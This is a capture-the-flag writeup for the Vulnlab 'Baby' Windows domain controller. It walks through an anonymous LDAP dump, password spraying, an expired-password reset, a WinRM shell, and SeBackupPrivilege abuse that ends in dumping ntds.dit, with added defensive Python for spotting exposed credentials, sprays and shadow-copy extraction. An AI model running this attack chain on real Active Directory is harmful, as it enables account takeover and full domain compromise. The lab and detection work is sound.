Vulnlab - Baby

```
➜ baby nxc smb 10.10.66.181
SMB 10.10.66.181 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
```
There is no guest access or anything similar, so let's try ldapsearch.

ldapsearch

```
➜ baby ldapsearch -x -b "dc=baby,dc=vl" -H ldap://10.10.66.181 > ldap_resul.txt
```
Now we can analyze it, but it is too big to read line by line, so:

```
➜ baby cat ldapresult.txt | grep -i "password"
badPasswordTime: 0
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
description: Set initial password to BabyStart123!
```

We got a password, but there is no user list yet. We already know that sAMAccountName carries the account names (users, groups, etc.), so:
```
➜ baby cat ldapresult.txt | grep -i "sAMAccountname"
sAMAccountName: dev
sAMAccountName: Jacqueline.Barnett
sAMAccountName: Ashley.Webb
sAMAccountName: Hugh.George
sAMAccountName: Leonard.Dyer
sAMAccountName: it
sAMAccountName: Connor.Wilkinson
sAMAccountName: Joseph.Hughes
sAMAccountName: Kerry.Wilson
sAMAccountName: Teresa.Bell
sAMAccountName: Caroline.Robinson
```
To save it cleanly:

```
➜ baby cat ldap-user.txt | awk '{print $2}'
dev
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
it
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
➜ baby cat ldap-user.txt | awk '{print $2}' > users.txt ## STATUS_PASSWORD_MUST_CHANGE
➜ baby nxc smb BABYDC -u users.txt -p 'BabyStart123!' --continue-on-succes
SMB 10.10.66.181 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
```
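The grep-and-awk steps above are the manual version of an audit every AD owner should run: who can read the directory anonymously, and which free-text attributes (description, info, comment) carry a credential. The script below is an added example, not part of the original writeup, that parses `ldapsearch -x` LDIF output properly (folded lines and base64 `attr::` values, which a plain grep misses), lists every sAMAccountName, and flags credential-looking text. The LDIF is constructed sample data with made-up accounts; only the description string found on the box is reused.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample shaped like `ldapsearch -x -b "dc=baby,dc=vl"` output.
# Accounts are made up; it includes a folded line and a base64 value on purpose.
SAMPLE_LDIF = """\
# extended LDIF
#

dn: CN=Alice Example,CN=Users,DC=baby,DC=vl
objectClass: user
sAMAccountName: Alice.Example
description: Set initial password to BabyStart123!

dn: CN=Bob Example,CN=Users,DC=baby,DC=vl
objectClass: user
sAMAccountName: Bob.Example
description: Helpdesk, desk 4

dn: CN=svc-backup,CN=Users,DC=baby,DC=vl
objectClass: user
sAMAccountName: svc-backup
description:: cHdkOiBTM3J2MWNlIQ==

dn: CN=ops.robot,CN=Users,DC=baby,DC=vl
objectClass: user
sAMAccountName: ops.robot
info: automation account; the shared secret
  lives in the vault, ticket 4471

dn: CN=dev,CN=Users,DC=baby,DC=vl
objectClass: group
sAMAccountName: dev

# search result
search: 2
result: 0 Success
"""

# Free-text attributes readable by anyone who can read the user object.
FREE_TEXT_ATTRS = ("description", "info", "comment")
CRED_HINT = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?|secret)\b", re.I)

Entry = Dict[str, List[str]]


def parse_ldif(text: str) -> List[Entry]:
    """LDIF -> list of entries (lower-cased attribute -> values). Unfolds
    continuation lines, decodes `attr::` base64 values and drops blocks with
    no dn (ldapsearch's trailing search:/result: summary)."""
    entries: List[Entry] = []
    current: Entry = {}
    pending: Optional[str] = None  # logical line being assembled

    def add_line(line: str) -> None:
        if not line or line.startswith("#"):
            return
        name, sep, value = line.partition(":")
        if not sep:
            return
        if value.startswith(":"):  # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        else:
            value = value.strip()
        current.setdefault(name.strip().lower(), []).append(value)

    for raw in text.splitlines() + [""]:
        if raw.startswith(" ") and pending is not None:
            pending += raw[1:]  # folded continuation line
            continue
        if pending is not None:
            add_line(pending)
            pending = None
        if raw == "":
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        pending = raw
    return entries


def account_names(entries: List[Entry], users_only: bool = False) -> List[str]:
    """Every sAMAccountName; with users_only the groups (dev, it) drop out."""
    names = []
    for e in entries:
        if "samaccountname" not in e:
            continue
        classes = {c.lower() for c in e.get("objectclass", [])}
        if users_only and "user" not in classes:
            continue
        names.append(e["samaccountname"][0])
    return names


def credential_hints(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """(sAMAccountName, attribute, value) where a free-text field mentions a credential."""
    hits = []
    for e in entries:
        name = e.get("samaccountname", ["<no sAMAccountName>"])[0]
        for attr in FREE_TEXT_ATTRS:
            for value in e.get(attr, []):
                if CRED_HINT.search(value):
                    hits.append((name, attr, value))
    return hits
```

Run it against a real dump with `parse_ldif(open("ldapresult.txt").read())`; anything `credential_hints` returns is a finding in its own right, and if the dump was taken with `-x` (anonymous bind) the readable directory is a second one.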
https://www.n00py.io/2021/09/resetting-expired-passwords-remotely/
```
➜ baby python3 smbpasswd.py 'Caroline.Robinson:BabyStart123!@baby.vl' -newpass Password123!
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully
➜ baby nxc smb BABYDC -u users.txt -p 'Password123!' --continue-on-succes
SMB 10.10.66.181 445 BABYDC [+] baby.vl\Caroline.Robinson:Password123!
```
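From the domain controller's side the spray above is a burst of 4625 events: one failure per account, all from one source, inside a few seconds, and the hit on Caroline.Robinson is not a normal failure at all but sub-status 0xC0000224 (STATUS_PASSWORD_MUST_CHANGE), which only occurs when the password was right. The detector below is an added example, not from the writeup; the log lines are constructed (pipe-separated 4625 fields, with 192.0.2.10 as a placeholder for the spraying host) and the window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# NTSTATUS sub-status values seen in 4625. 0xC0000224 is the one the writeup
# relies on: the credential was correct, only the must-change flag blocked it.
SUBSTATUS = {
    "0xC000006A": "wrong password",
    "0xC0000064": "user name does not exist",
    "0xC0000224": "password must change (credential was correct)",
    "0xC0000234": "account locked out",
}

# Constructed sample: ts|event id|target user|source ip|sub-status.
# Not real logs from the box; 192.0.2.10 is a documentation-range placeholder.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z|4625|Jacqueline.Barnett|192.0.2.10|0xC000006A
2024-05-01T10:00:02Z|4625|Ashley.Webb|192.0.2.10|0xC000006A
2024-05-01T10:00:02Z|4625|Hugh.George|192.0.2.10|0xC000006A
2024-05-01T10:00:03Z|4625|Leonard.Dyer|192.0.2.10|0xC000006A
2024-05-01T10:00:04Z|4625|Connor.Wilkinson|192.0.2.10|0xC000006A
2024-05-01T10:00:04Z|4625|Joseph.Hughes|192.0.2.10|0xC000006A
2024-05-01T10:00:05Z|4625|Caroline.Robinson|192.0.2.10|0xC0000224
2024-05-01T10:00:09Z|4624|Caroline.Robinson|192.0.2.10|0x0
2024-05-01T10:31:00Z|4625|Hugh.George|10.10.66.50|0xC000006A
2024-05-01T10:31:09Z|4625|Hugh.George|10.10.66.50|0xC000006A
2024-05-01T10:31:20Z|4625|Hugh.George|10.10.66.50|0xC000006A
"""


@dataclass(frozen=True)
class Failure:
    ts: datetime
    target: str
    source: str
    substatus: str


def parse_failures(text: str) -> List[Failure]:
    """Keep only 4625 (failed logon) records."""
    out = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, target, source, sub = line.split("|")
        if event_id != "4625":
            continue
        out.append(Failure(datetime.fromisoformat(ts.replace("Z", "+00:00")), target, source, sub))
    return out


def detect_spray(failures: List[Failure], window: timedelta = timedelta(minutes=5),
                 min_users: int = 5) -> Dict[str, dict]:
    """A spray is many *distinct* accounts failing from one source inside a short
    window (one or two tries each); a brute force hammers one account instead.
    Returns source -> users targeted, users whose password was actually right,
    and the failure reasons seen."""
    by_source = defaultdict(list)
    for f in failures:
        by_source[f.source].append(f)
    alerts = {}
    for source, evs in by_source.items():
        evs.sort(key=lambda f: f.ts)
        flagged = set()
        for i, first in enumerate(evs):
            in_window = [f for f in evs[i:] if f.ts - first.ts <= window]
            if len({f.target for f in in_window}) >= min_users:
                flagged.update(in_window)
        if flagged:
            alerts[source] = {
                "users": sorted({f.target for f in flagged}),
                "correct_password": sorted({f.target for f in flagged if f.substatus == "0xC0000224"}),
                "reasons": sorted({SUBSTATUS.get(f.substatus, f.substatus) for f in flagged}),
            }
    return alerts
```

The three failures for Hugh.George from 10.10.66.50 stay quiet (one account, so a typo or a lockout-bound guess, not a spray), while the burst from 192.0.2.10 is flagged with Caroline.Robinson called out separately: a "must change password" failure right after a spray means the sprayed password is valid and that account needs a reset before the attacker does it for you.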
We also get a WinRM shell:

```
➜ baby nxc winrm BABYDC -u Caroline.Robinson -p 'Password123!' --continue-on-succes
WINRM 10.10.66.181 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.10.66.181 5985 BABYDC [+] baby.vl\Caroline.Robinson:Password123! (Pwn3d!)
```
SeBackupPrivilege

```
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /all
SeBackupPrivilege Back up files and directories Enabled
```
Here is the quick path to root:

```
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> robocopy /b C:\Users\Administrator\Desktop .; cat root.txt
---
VL{REDACTED}
```
Alternatively, dump ntds.dit and the SYSTEM hive, then crack the admin hash:

```
➜ baby cat raj.dsh
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
```
Convert it with unix2dos:

```
➜ baby unix2dos raj.dsh
unix2dos: converting file raj.dsh to DOS format...
```
and upload it to C:\ProgramData:

```
*Evil-WinRM* PS C:\ProgramData> diskshadow /s raj.dsh
*Evil-WinRM* PS C:\ProgramData> robocopy /b z:\windows\ntds . ntds.dit
```
Download ntds.dit and the SYSTEM hive, then:

```
impacket-secretsdump -ntds ntds.dit -system system local
```
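The whole SeBackupPrivilege chain leaves a very recognisable process trail on the DC: a scripted `diskshadow /s`, then `robocopy /b` (backup mode) against the NTDS folder, from a user who is not a backup operator. The rules below are an added example for detection engineers, not from the writeup; the process-creation records are constructed in a Sysmon event 1 / 4688 shape (`ts|user|image|command line`) after the commands above, and the backup-account allowlist is an assumption for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed process-creation records shaped after the writeup's commands.
# Not logs from the box; users and paths are illustrative.
SAMPLE_PROC = r"""
2024-05-01T09:00:00Z|BABY\svc-veeam|C:\Windows\System32\diskshadow.exe|diskshadow /s C:\Backup\nightly.dsh
2024-05-01T10:12:03Z|BABY\Caroline.Robinson|C:\Windows\System32\diskshadow.exe|diskshadow /s raj.dsh
2024-05-01T10:12:20Z|BABY\Caroline.Robinson|C:\Windows\System32\Robocopy.exe|robocopy /b z:\windows\ntds . ntds.dit
2024-05-01T10:14:41Z|BABY\Caroline.Robinson|C:\Windows\System32\Robocopy.exe|robocopy /b C:\Users\Administrator\Desktop .
2024-05-01T11:30:00Z|BABY\Hugh.George|C:\Windows\System32\Robocopy.exe|robocopy C:\Share\docs D:\Archive /E
"""

# Hypothetical allowlist: accounts expected to run scripted shadow copies.
BACKUP_ALLOWLIST = {r"BABY\svc-veeam"}

FLAG_S = re.compile(r"(?i)(?:^|\s)/s(?=\s|$)")   # diskshadow /s <script>
FLAG_B = re.compile(r"(?i)(?:^|\s)/b(?=\s|$)")   # robocopy backup mode (uses SeBackupPrivilege)
NTDS_PATH = re.compile(r"(?i)ntds\.dit|\\ntds\b")

Row = Tuple[datetime, str, str, str]      # ts, user, image, command line
Finding = Tuple[datetime, str, str, str]  # ts, user, rule, severity


def parse_proc(text: str) -> List[Row]:
    rows = []
    for line in text.strip().splitlines():
        ts, user, image, cmd = line.split("|", 3)
        rows.append((datetime.fromisoformat(ts.replace("Z", "+00:00")), user, image, cmd))
    return rows


def evaluate(rows: List[Row]) -> List[Finding]:
    """Per-event rules; one event can trip several."""
    findings: List[Finding] = []
    for ts, user, image, cmd in rows:
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe == "diskshadow.exe" and FLAG_S.search(cmd):
            sev = "low" if user in BACKUP_ALLOWLIST else "high"
            findings.append((ts, user, "scripted diskshadow run", sev))
        if exe in ("robocopy.exe", "xcopy.exe") and FLAG_B.search(cmd):
            findings.append((ts, user, "backup-mode copy (/b)", "medium"))
        if NTDS_PATH.search(cmd):
            findings.append((ts, user, "ntds.dit / NTDS folder referenced", "high"))
    return findings


def correlate(findings: List[Finding], window: timedelta = timedelta(minutes=10)) -> List[str]:
    """Users who trip two or more distinct non-low rules inside `window`:
    shadow copy followed by a backup-mode copy is the extraction sequence itself."""
    by_user = defaultdict(list)
    for ts, user, rule, sev in findings:
        if sev != "low":
            by_user[user].append((ts, rule))
    chained = []
    for user, items in by_user.items():
        items.sort()
        for t0, _ in items:
            rules = {r for t, r in items if t0 <= t <= t0 + window}
            if len(rules) >= 2:
                chained.append(user)
                break
    return sorted(chained)
```

The allowlisted backup account still produces a low finding so the baseline stays visible; the same command from anyone else is high on its own, and `correlate` turns the diskshadow-then-robocopy pair into one alert. Beyond detection, the fix is the one the box illustrates: SeBackupPrivilege on a domain controller is equivalent to domain admin, so membership in Backup Operators there should be as tightly controlled as Domain Admins.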
😉
This post is licensed under CC BY 4.0 by the author.